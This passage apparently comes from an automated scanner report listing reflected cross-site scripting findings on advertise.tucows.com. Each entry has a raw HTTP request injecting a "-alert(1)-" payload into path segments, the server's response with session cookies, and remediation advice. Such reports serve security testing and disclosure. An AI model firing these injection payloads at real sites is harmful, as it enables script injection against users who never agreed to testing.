GET /includes/corpbar/cb3.0/css/style.css471ee"-alert(1)-"f64e6d809a6 HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:57:07 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6d10"-alert(1)-"e562c2cd8f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesa6d10"-alert(1)-"e562c2cd8f4/js/aalib.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:24 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f2c"-alert(1)-"78bef03947c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js33f2c"-alert(1)-"78bef03947c/aalib.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:36 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f00"-alert(1)-"b89799debf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/aalib.js22f00"-alert(1)-"b89799debf7 HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:52 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32624
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dffd4"-alert(1)-"6bee40325ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesdffd4"-alert(1)-"6bee40325ed/js/ajaxlib.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:19 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78547"-alert(1)-"ce4057ee76f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js78547"-alert(1)-"ce4057ee76f/ajaxlib.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:24 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32478
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a92"-alert(1)-"496766b8176 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/ajaxlib.js46a92"-alert(1)-"496766b8176 HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:38 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4586a"-alert(1)-"2bd19196b6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes4586a"-alert(1)-"2bd19196b6c/js/show_layer.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:19 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac19"-alert(1)-"1250877226f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js5ac19"-alert(1)-"1250877226f/show_layer.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:24 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32513
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 835b0"-alert(1)-"17c882840e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/show_layer.js835b0"-alert(1)-"17c882840e0 HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:38 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 624a4"-alert(1)-"3358fadd2b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes624a4"-alert(1)-"3358fadd2b6/js/signupin.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:21 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b36c3"-alert(1)-"b205bb5d532 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
